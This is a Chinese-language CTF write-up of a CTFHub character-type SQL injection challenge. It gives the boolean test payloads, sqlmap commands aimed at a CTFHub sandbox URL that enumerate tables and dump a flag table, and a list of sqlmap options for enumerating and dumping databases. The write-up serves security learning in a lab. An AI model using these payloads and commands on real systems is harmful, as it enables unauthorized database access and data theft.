CTFHub | 字符型注入

0x00 前言

         CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

字符型注入:

        SQL注入 字符型注入, 尝试获取数据库中的 flag

CTFHub | 字符型注入_第1张图片 网页显示内容

         

        

0x02 解题过程

        此题目和上一题相似,一个是整数型注入,一个是字符型注入。字符型注入就是注入字符串参数,判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag ,这里就不在使用手工注入,而是使用 sqlmap 工具完成。

        

使用sqlmap工具枚举DBMS数据库中所有的表,时间较长

python3 sqlmap.py -u http://challenge-260f8e2b86740ff2.sandbox.ctfhub.com:10800/?id=1'

        

检查枚举出的DBMS数据库中所有的表,发现sqli数据库中有一个表名为flag比较可疑

        

检查flag表中的全部数据,发现此题flag

CTFHub | 字符型注入_第2张图片

python3 sqlmap.py -u http://challenge-260f8e2b86740ff2.sandbox.ctfhub.com:10800/?id=1' -T flag --columns --dump

        

        

0x03 SQL字符型注入

字符型注入漏洞判断:

  1. payload:?id=1' and 1=1 --+
  2. payload:?id=1' and 1=2 --+

        

sqlmap简单使用:

  1.  -u                          指定一个网页
  2.  -d                          直接连接数据库
  3.  -T                          查询指定表中数据
  4.  --users                 枚举目标全部用户
  5.  --roles                  枚举用户角色
  6.  --dbs                    枚举全部数据库
  7.  --tables                枚举数据库中全部表
  8.  --columns            枚举数据库表中全部列
  9.  --dump                 存储数据库表中的条目

        

        

0x04 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

你可能感兴趣的:(CTF精进之路,CTF,web安全)